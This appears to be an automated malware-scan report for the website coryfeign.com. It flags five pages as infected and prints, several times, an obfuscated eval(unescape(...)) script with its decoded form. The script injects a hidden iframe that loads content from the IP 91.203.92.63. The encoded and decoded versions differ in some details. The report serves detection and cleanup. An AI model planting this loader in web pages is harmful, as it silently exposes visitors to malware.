Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=coryfeign.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://coryfeign.com/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sat, 10 Jan 2015 07:14:25 GMT Accept-Ranges: bytes Age: 0 Location: http://www.coryfeign.com/index.php Server: Apache/2 Content-Length: 218 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 10 Jan 2015 08:14:24 GMT | clean |
http://www.coryfeign.com/index.php | 200 OK Content-Length: 10488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%63%37%63%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%31%2e%32%30%33%2e%39%32%2e%36%33%2f%74%78%78%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%33%36%30%29%2b%27%36%39%66%31%32%5c%27%20%77%69%64%74%68%3d%32%38%30%20%68%65%69%67%68%74%3d%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') <iframe name=2 src='http://91.203.92.63/txx/?5490492dbf47358' width=134 height=487 style='display: none'></iframe> Antivirus reports:
| ||
http://coryfeign.com/templates/rt_versatility_iii/js/mootools.r462.js | 200 OK Content-Length: 24988 Content-Type: application/x-javascript | clean |
http://coryfeign.com/templates/rt_versatility_iii/js/roktools.js | 200 OK Content-Length: 1032 Content-Type: application/x-javascript | clean |
http://coryfeign.com/templates/rt_versatility_iii/js/mootools.bgiframe.js | 200 OK Content-Length: 964 Content-Type: application/x-javascript | clean |
http://coryfeign.com/templates/rt_versatility_iii/js/rokmoomenu.js | 200 OK Content-Length: 1904 Content-Type: application/x-javascript | clean |
http://coryfeign.com/templates/rt_versatility_iii/js/slimbox.js | 200 OK Content-Length: 4292 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19468 Content-Type: text/javascript | clean |
http://coryfeign.com/index.php?option=com_frontpage&Itemid=1 | 200 OK Content-Length: 10481 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%63%37%63%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%31%2e%32%30%33%2e%39%32%2e%36%33%2f%74%78%78%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%33%36%30%29%2b%27%36%39%66%31%32%5c%27%20%77%69%64%74%68%3d%32%38%30%20%68%65%69%67%68%74%3d%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') <iframe name=2 src='http://91.203.92.63/txx/?5592192dbf47358' width=134 height=487 style='display: none'></iframe> Antivirus reports:
| ||
http://coryfeign.com/index.php?option=com_content&task=section&id=1&Itemid=2 | 200 OK Content-Length: 10808 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%63%37%63%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%31%2e%32%30%33%2e%39%32%2e%36%33%2f%74%78%78%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%33%36%30%29%2b%27%36%39%66%31%32%5c%27%20%77%69%64%74%68%3d%32%38%30%20%68%65%69%67%68%74%3d%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') <iframe name=2 src='http://91.203.92.63/txx/?4775592dbf47358' width=134 height=487 style='display: none'></iframe> Antivirus reports:
| ||
http://coryfeign.com/index.php?option=com_contact&Itemid=3 | 200 OK Content-Length: 16892 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%63%37%63%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%31%2e%32%30%33%2e%39%32%2e%36%33%2f%74%78%78%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%33%36%30%29%2b%27%36%39%66%31%32%5c%27%20%77%69%64%74%68%3d%32%38%30%20%68%65%69%67%68%74%3d%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') <iframe name=2 src='http://91.203.92.63/txx/?3663692dbf47358' width=134 height=487 style='display: none'></iframe> Antivirus reports:
| ||
http://coryfeign.com/index.php | 200 OK Content-Length: 10481 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%63%37%63%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%31%2e%32%30%33%2e%39%32%2e%36%33%2f%74%78%78%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%33%36%30%29%2b%27%36%39%66%31%32%5c%27%20%77%69%64%74%68%3d%32%38%30%20%68%65%69%67%68%74%3d%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=2 src=\'http://91.203.92.63/txx/?'+Math.round(Math.random()*65258)+'92dbf47358\' width=134 height=487 style=\'display: none\'></iframe>') <iframe name=2 src='http://91.203.92.63/txx/?5498092dbf47358' width=134 height=487 style='display: none'></iframe> Antivirus reports:
| ||
http://coryfeign.com/index.php?option=com_rss&feed=RSS2.0&no_html=1 | 200 OK Content-Length: 594 Content-Type: application/xml | clean |
http://coryfeign.com/test404page.js | 404 Not Found Content-Length: 510 Content-Type: text/html | clean |
http://coryfeign.com/index.php?option=com_rss&feed=ATOM0.3&no_html=1 | 200 OK Content-Length: 424 Content-Type: application/atom+xml | clean |
http://coryfeign.com/index.php?option=com_rss&feed=OPML&no_html=1 | 200 OK Content-Length: 268 Content-Type: application/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: coryfeign.com
Result:
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Sat, 10 Jan 2015 07:14:25 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.coryfeign.com/index.php
Server: Apache/2
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 10 Jan 2015 08:14:24 GMT
...218 bytes of data.
GET / HTTP/1.1
Host: coryfeign.com
Result:
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Sat, 10 Jan 2015 07:14:25 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.coryfeign.com/index.php
Server: Apache/2
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 10 Jan 2015 08:14:24 GMT
...218 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: coryfeign.com
Referer: http://www.google.com/search?q=coryfeign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: coryfeign.com
Referer: http://www.google.com/search?q=coryfeign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.